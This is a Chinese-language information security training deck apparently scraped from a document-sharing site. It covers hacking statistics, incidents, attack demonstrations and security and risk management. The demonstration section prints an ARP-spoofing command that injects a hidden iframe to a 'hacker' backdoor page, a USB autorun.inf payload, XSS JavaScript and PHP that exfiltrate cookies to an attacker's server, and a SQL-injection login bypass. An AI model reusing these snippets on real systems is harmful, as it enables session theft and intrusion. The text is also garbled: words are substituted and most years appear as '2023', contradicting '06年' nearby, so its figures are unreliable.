版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
个人介绍
高显嵩工作经受:中国“互联网信息安全与政府监管”专家组成员中国法证技术争论组成员北京司法局电子数据鉴定协会理事北京播送电视大学特聘专家原微软公司的技术支持工程师工程背景劳动部全国民办中介机构信用等级评定系统劳动部全国学问竞赛评分系统劳动部七个功能平台合并方案北京统计局的报表打印系统北京电大一站式平台合并的规划及实施为考研在线供给整体安全解决方安及实施为国家电力部内部网络设计安全解决方安及实施鞍山移动公司网络规划长期负责北京市安全局国家安全部内部技术培训负责华彬大厦的整个网络规划及实施美国百麦公司北京分公司的整个网络规划及实施主要内容信息安全的重要性信息安全问题分析信息安全治理概述信息安全风险治理信息安全人员治理信息安全重要性当前我国网络信息安全的状况网络及计算机病毒传播泛滥垃圾邮件和病毒邮件泛滥黑客攻击大事频繁用户的个人隐私及计算机的使用权受到侵害网络犯罪大事频繁监管力度不够涉及版权问题的大事增多没有统一完善的适合国情的安全标准及法规没有职责清楚的治理部门或治理小组制约与网络根底设施和技术环境安全体系不健全全民安全意识及计算机网络学问薄弱CERT有关信息安全的统计
CERT有关信息安全的统计CERT有关信息安全的统计
网络病毒传播泛滥据2023年调查,我国约73%的计算机用户曾感染病毒,2023年上半年升至83%。其中,感染3次以上的用户高达59%,而且病毒的破坏性较大,被病毒破坏全部数据的占14%,破坏局部数据的占57%。对病毒的预防和觉察速度相对缓慢垃圾邮件及病毒邮件泛滥黑客离我们很近1996年信息安全数据显示,世界上平均每20秒就有一起黑客大事发生,无论是政府机构、军事部门,还是各大银行、大公司,只要与互联网接轨,就难逃黑客的“黑手”。据美国网络安全公司Sophos公布的报告显示,在2023年第一季度,平均每5秒钟就会有一个网页成为黑客们的“盘中餐”。中国网民每年被网络黑客“黑”掉76亿元。FBI计算机犯罪调查报告2023年503家机构中,有60%受到了攻击2023年其中223家〔占503家的44%〕损失的总和到达$4.55848亿2023年530家机构中有75%〔398家〕在年内受到了攻击2023年251家〔占530家的47%〕的经济损失总和为$2.01799734亿全球信息安全损失数额:
中国已成为全球黑客的第三大来源地
有关统计数据显示,目前我国95%的与因特网相联的网络治理中心都遭到过国境内外黑客的攻击或侵入,受害涉及的掩盖面越来越大、程度越来越深。据国际互联网保安公司Symantec年的报告指出,中国甚至已经成为全球黑客的第三大来源地,竟然有6.9%的攻击国际互联网活动都是由中国发出的。然而面对这种局面,我国却缺乏像西方兴旺国家那样健全的防范措施。2023年黑客大事中韩新人王网上对抗遭黑客入侵推迟10多分钟中韩围棋新人王对抗赛在中国的新浪网和韩国cyber网站落子,孔杰七段执白中盘战胜韩国的宋泰坤四段。赛前,由于有人以孔杰的名字入侵竞赛的效劳器,导致竞赛推迟了10多分钟才正常进展。2023年黑客大事百度连续患病严峻黑客攻击5月15日至5月18日,中文搜寻网站百度遭到中国互联网有史以来罕见黑客攻击。据百度负责技术的副总裁刘建国介绍,自5月15日22:00起,百度的检索量突然大增,此番增长并未引起工程师留意。5月16日,攻击更加猛烈,每秒钟攻击次数搞到达1000次,同一个词被查询次数最多达38863次。据互联网技术专家介绍,每秒钟攻击100次就已经属于特别严峻的攻击,而每秒钟1000次的攻击就实属罕见2023年黑客大事263玩耍论坛遭黑客攻击关闭2023年黑客大事腾讯效劳器被攻击10月17日早上10时许,国内各地网民间续腾讯QQ无法登陆。据腾讯QQ内部技术人员透露,一国内团体,利用腾讯QQ效劳器漏洞挟制腾讯支付100万美金作为“修复”费用,腾讯QQ不予理睬后,该组织于17日正式发动攻击,腾讯QQ效劳器在1个小时内大面积消失故障,不得不全面终止进展抢修.本次行动组织严谨、操作快速,业内有局部安全治理人士称网络进入软件绑架讹诈时代。2023年黑客大事江民网站被攻击2023年10月17日国内著名的杀毒软件厂商江民公司的网站被一名为河马史诗的黑客攻破,页面内容被篡改。攻击缘由:江民公司的最新杀毒软件产品KV2023的升级导致用户在上网时无法翻开“邮件监控和网页监控”,用户在江民公司的官方论坛发反映后,江民没有做出准时的回复,也没能在短时间内解决用户的问题。2023年黑客大事频繁或许你的计算机正在被当作从事违法犯罪活动的工具,而当这些静静发生的时候,你却一无所知,由于你的电脑已经成为被别人掌握的“僵尸电脑”。2023年黑客大事国内首起僵尸网络大事今年27岁的徐立系唐山市某企业工人,其利用某些手段在互联网上传播其编写的特定程序,先后植入4万余台计算机,形成了中国首例BOTNET“僵尸网络。
2023年10月至2023年1月,徐立操纵“僵尸网络”对北京大吕黄钟电子商务所属音乐网站北京飞行网〔简称酷乐〕,发动屡次攻击,致使该公司蒙受重大经济损失,并导致北京电信数据中心某机房网络设备大面积瘫痪。2023年黑客大事2023年12月31日中国工商银行被黑06年的最终一天,很多网友都收到一些号称“工行要倒闭,全部存款均没收”之类的新闻链接,地址都是正牌的,而不是盗版的。原来工商被黑客入侵,截止当天晚上11点,觉察此漏洞已经修改好。07年第一黑客大事深圳律师网被黑当进入该网站之后,就发生事故了,觉察,已经被黑.主要有以下字样:天空未留痕迹,鸟儿却已飞过.网络亦是虚拟,疯狂亦是叛逆.
.......~~~敬重的網站治理員您好~~~.....................台湾是中国的,日本是吃S的...........................假设你是中国人......................请保存此页几天感谢!.........
少年★浪子所向披靡OICQ11888956例子:得到本地登录密码Pulist.exe+findpass.exePasswordReminder.exe例子:记录本地登录密码GINAPassWordSniffer例子得到远程计算机的密码IpcScan2.0例子:更改本地治理员密码WindowsNT/2023/XP/2023/Linux/Unix系统,本地接触可以更改任意用户的密码。一张软盘更改本地治理员密码Ntpassword一张光盘更改本地治理员密码ERDCommander2023例子:ERDCOMMANDER例子:ERDCOMMANDER例子:得到他人的邮件密码密码监听器2.8例子:内网渗透ZXARPS.EXE内网主机访问任意站点被入侵指定的IP段中的用户访问的全部网站都插入一个框架代码zxarps.exe-idx0-ip-9-port80-insert“<iframesrc=‘://hacker/backdoor.htm”width=0height=0>“ARP协议工作原理ARP哄骗交换机ARP哄骗计算机例子:内网U盘感染U盘在互联网和局域网内穿插使用文件被盗取Autorun.infautorun风暴[autorun]open=shell\open=翻开(&O)shell\open\Command=WScript.exe.\autorun.vbsshell\open\Default=1shell\explore=资源治理器(&X)shell\explore\Command=WScript.exe.\autorun.vbs例子:查看网络内任何人的上网记录可以记录同一局域网内任何计算机上扫瞄的网页内容,观察的邮箱内容,登陆的ftp的内容。用Outlook或者OutlookExpress承受的全部邮件都回同时被该软件接收。例子:查看MSN密码例子:观察星号密码例子:读取缓存密码例子:掌握他人计算机Dameware4.5RemoteAdministrator2.1是一种网络治理软件,但是常常被黑客利用来远程掌握和治理,被入侵者的计算机。例子:翻开对方摄像头和语音SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击XSS跨站脚本构建了个Javascript脚本传递客户端的cookie到黑客的效劳器Javascript脚本可以简洁的这样写
varimg=newImage;
img.src=‘get_cookie.php?var=’+encodeURI(document.cookie);
然后效劳器端使用PHP简洁写了个脚本保存Cookie数据
<?php
if(isset($_GET[‘var’])){
file_put_contents(‘./cookie/’.time.‘.txt’,urldecode($_GET[‘var’]));
}?>
构造SQL登陆语句用户名:admin密码:1’or‘1’=‘1其他例子击键记录Office文档挂栽木马网页木马木马捆绑信息安全治理概述例一:局域网内病毒泛滥成灾。例二:网络中为什么会有ARP哄骗的问题发生例三:局域网内计算机故障频繁发生例四:为什么要给每个用户治理员权限先来分析两个例子信息安全的成败取决于两个因素:技术和治理。技术是信息安全的构筑材料,治理是真正的粘合剂和催化剂。人们常说,三分技术,七分治理,可见治理对信息安全的重要性。信息安全治理〔InformationSecurityManagement〕作为组织完整的治理体系中一个重要的环节,它构成了信息安全具有能动性的局部,是指导和掌握组织的关于信息安全风险的相互协调的活动,其针对对象就是组织的信息资产。现实世界里大多数安全大事的发生和安全隐患的存在,与其说是技术上的缘由,不如说是治理不善造成的,理解并重视治理对于信息安全的关键作用,对于真正实现信息安全目标来说尤其重要。什么是信息安全治理?
根据风险评估结果、法律法规要求、组织业务运作自身需要来确定控制目标与控制措施。
实施所选的安全控制措施。
针对检查结果采取应对措施,改进安全状况。
依据策略、程序、标准和法律法规,对安全措施的实施情况进行符合性检查。信息安全治理模型信息安全必需从整体考虑,必需做到“有打算有目标、觉察问题、分析问题、实行措施解决问题、后续监视避开再现”这样全程治理的思路,这就要求建立的是一套完整的信息安全治理体系,这样的系统工程,只有处于组织最高治理者领导和支持之下,才可能成功最高治理层通过明确信息安全目标和方针为信息安全活动指引方向最高治理层能够为信息安全活动供给必要的资源支持最高治理层能够在重大问题上做出决策最高治理层可以协调组织不同单位不同环节的关系,提升促动力说究竟,最高治理者是组织信息安全的最终责任人组织高管全面负责信息安全治理制定有效的安全治理打算,可以确保信息安全策略得到恰当执行进展有效安全治理的途径,应当是自上而下的〔Top-Down〕:最高治理层负责启动并定义组织的安全方针治理中层负责将安全策略充实成标准、基线、指南和程序,并监视执行业务经理或安全专家负责实施安全治理文件中的指定配置最终用户负责遵守组织全部的安全策略安全治理打算小组应当开发三类打算:战略打算〔strategicplan〕是长期打算〔例如5年〕,相对稳定,定义了组织的目标和使命战术打算〔tacticalplan〕是中期打算〔例如1年〕,是对实现战略打算中既定目标的任务和进度的细节描述,例如雇用打算、预算打算、维护打算、系统开发打算等操作打算〔operationalplan〕是短期的高度细化的打算,须常常更新〔每月或每季度〕,例如培训打算、系统部署打算、产品设计打算等按打算行事数据收集者〔DataCollector〕对数据主体〔DataSubject〕:准确〔Accuracy〕、隐私〔Privacy〕;数据保管者〔DataCustodian〕对数据拥有者〔DataOwner〕:可用性〔Availability〕、完整性〔Integrity〕、保密性〔Confidentiality〕;数据用户〔DataUsers〕对拥有者/主体〔Owner/Subject〕:保密性〔Confidentiality〕和完整性;系统用户〔SystemUsers〕对系统拥有者〔SystemOwner〕:可用性〔Availability〕和软件完整性〔SoftwareIntegrity〕;系统治理者〔SystemManager〕对用户〔Users〕,可用性〔Integrity〕、完整性〔Integrity〕;用户〔Users〕对其它用户〔OtherUsers〕:可用性〔Availability〕。重要角色和职责信息安全管风险治理风险风险治理〔RiskManagement〕就是识别风险、评估风险、实行措施将风险削减到可承受水平,并维持这个风险水平的过程。风险治理是信息安全治理的核心内容。在信息安全领域,风险〔Risk〕就是指信息资产患病损坏并给企业带来负面影响的潜在可能性。风险治理风险治理概述资产〔Asset〕——对组织具有价值的信息资产,包括计算机硬件、通信设施、数据库、文档信息、软件、信息效劳和人员等,全部这些资产都需要妥当爱护。威逼〔Threat〕——可能对资产或组织造成损害的某种安全大事发生的潜在缘由,需要识别出威逼源〔Threatsource〕或威逼代理〔Threatagent〕。弱点〔Vulnerability〕——也被称作漏洞或脆弱性,即资产或资产组中存在的可被威逼利用的缺点,弱点一旦被利用,就可能对资产造成损害。风险〔Risk〕——特定威逼利用资产弱点给资产或资产组带来损害的潜在可能性。可能性〔Likelihood〕——对威逼发生几率〔Probability〕或频率〔Frequency〕的定性描述。影响〔Impact〕——后果〔Consequence〕,意外大事发生给组织带来的直接或间接的损失或损害。安全措施〔Safeguard〕——掌握〔control〕或对策〔countermeasure〕,即通过防范威逼、削减弱点、限制意外大事带来影响等途径来消减风险的机制、方法和措施。残留风险〔ResidualRisk〕——在实施安全措施之后仍旧存在的风险。风险治理相关要素风险RISKRISKRISKRISK风险基本的风险采取措施后剩余的风险资产威胁弱点资产威胁弱点风险治理的目标安全控制的成本安全事件造成的损失最小化的总成本低高高安全成本/损失所提供的安全水平关键是达成本钱利益的平衡识别并评价资产识别并评估威胁识别并评估弱点现有控制确认风险评价接受保持现有控制确定风险消减策略选择控制目标和控制方式实施选定的控制YesNo确认并评估残留风险定期评估风险评估风险消减风险接受及控制风险管理风险治理的一般过程风险评估〔RiskAssessment〕是对信息资产及其价值、面临的威逼、存在的弱点,以及三者综合作用而带来风险的大小或水平的评估。作为风险治理的根底,风险评估是组织确定信息安全需求的一个重要途径,属于组织信息安全治理体系筹划的过程。主要任务包括:识别构成风险的各种因素评估风险发生的可能性和造成的影响,并最终评价风险水平或大小确定组织承受风险的力量确定风险消减和掌握的策略、目标和优先挨次推举风险消减对策以供实施包括风险分析〔RiskAnalysis〕和风险评价〔RiskEvaluation〕两局部,但一般来说,风险评估和风险分析同义。什么是风险评估?降低风险〔ReduceRisk〕——实施有效掌握,将风险降低到可承受的程度,实际上就是力图减小威逼发生的可能性和带来的影响,包括:削减威逼:例如,实施恶意软件掌握程序,削减信息系统受恶意软件攻击的时机削减弱点:例如,通过安全意识培训,强化职员的安全意识与安全操作力量降低影响:例如,制定灾难恢复打算和业务连续性打算,做好备份躲避风险〔AvoidRisk〕——或者RejectingRisk。有时候,组织可以选择放弃某些可能引来风险的业务或资产,以此躲避风险。例如,将重要的计算机系统与互联网隔离,使其免遭来自外部网络的攻击。转嫁风险〔TransferRisk〕——也称作RiskAssignment。将风险全部或者局部地转移到其他责任方,例如购置商业保险。承受风险〔AcceptRisk〕——在实施了其他风险应对措施之后,对于残留的风险,组织可以选择承受。确定风险消减策略确定安全〔即零风险〕是不行能的。实施安全掌握后会有残留风险或残存风险〔ResidualRisk〕。为了实现信息安全,应当确保残留风险在可承受的范围内:残留风险Rr=原有风险R0-掌握效力ΔR残留风险Rr≤可承受的风险Rt对残留风险进展确认和评价的过程其实就是风险承受的过程。决策者可以依据风险评估的结果来确定一个阀值,以该阀值作为是否承受残留风险的标准。评价残留风险信息安全人员治理人是信息安全的关键因素,人员治理不善会给组织带来特别大的安全威逼和风险。有调查显示,大多数重大信息安全大事通常都来自组织内部,例如,员工受利益驱使将公司技术图纸出卖给竞争对手,利用内部系统从事经济犯罪活动,或者由于缺乏安全意识或操作技能而导致误操作,引起信息系统故障等。为降低内部员工所带来的人为过失、盗窃、欺诈及滥用设施的风险,并且避开引发法律风险,组织应当实行措施,加强内部人员的安全治理:对工作申请者实施背景检查签署雇用合同和保密协议加强在职人员的安全治理严格掌握人员离职程序必需高度重视人员安全问题背景检查是工作申请过程的一个局部,组织至少会审查申请人简历中的根本信息。对于敏感职位,可能还会考虑进一步的调查。调查过程中,组织可以恳求访问申请人的信用和犯罪记录,甚至可以聘请外部公司对申请人进展调查,以确定是否存在潜在问题或利益冲突。通过背景检查,可以防止:由于人员辞退而导致法律诉讼由于雇用疏忽而导致第三方的法律诉讼雇用不合格的人员丧失商业隐秘员工从一般岗位转入信息安全重要岗位,组织也应当对其进展检查,对于处在有相当权力位置的人员,这种检查应定期进展。背景检查〔BACKGROUNDCHECK〕组织应与全部员工签订保密协议,作为雇用合同根本条款的一局部保密协议应明确规定雇员对组织信息安全的责任、保密要求及违约的法律责任签订保密承诺旨在加强员工对组织信息安全应担当的责任,协议上应有员工的签名并由其保存一份协议副本对于处于试用期的新员工,要求其签订一份保密承诺在允许第三方用户使用信息处理设施之前,要求其签订保密协议当雇用期或合同期有更改,特殊是雇员到期离职或合同终止时,应重申保密协议保密协议〔CONFIDENTIALITYAGREEMENT〕职务分别〔SeparationofDuties〕,将一个关键任务分成多个不同的局部,每个局部由不同的人执行。共谋〔Coll
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 初中八年级地理“鱼米之乡-长江三角洲地区”教学设计
- 初中九年级英语Unit 4 Section B 3a-3c写作教学设计
- 高三化学一轮复习乙酸知识总结教学设计
- 泵站工程课程设计
- RAG优化知识问答系统案例课程设计
- 江苏省赣榆县智贤中学高中体育 田径教案3
- 基于Simulink的倒立摆控制项目课程设计
- 冲孔凹模的课程设计
- 编程基础课程设计心得
- 初中蜡染与扎染课程设计
- 1.第一章-职业道德 - (2024消防设施操作员)
- DB22T 1822-2013 公共场所双语标识英文译法 通则
- 药事法规课件-医疗机构药事管理
- 新标准商务英语阅读教程1- 课件 Unit-1 Work and travel
- 房地产买房送车执行活动策划方案
- 美的集团第-级公司分权手册
- 网络传播概论(彭兰第5版) 课件全套 第1-8章 网络媒介的演变-网络传播中的“数字鸿沟”
- GB/T 38470-2023再生铜合金原料
- 人教版数学八年级上册《从分数到分式》公开课一等奖创新课件
- 标准摩尔生成Gibbs自由能
- 第一章 血液学绪论
评论
0/150
提交评论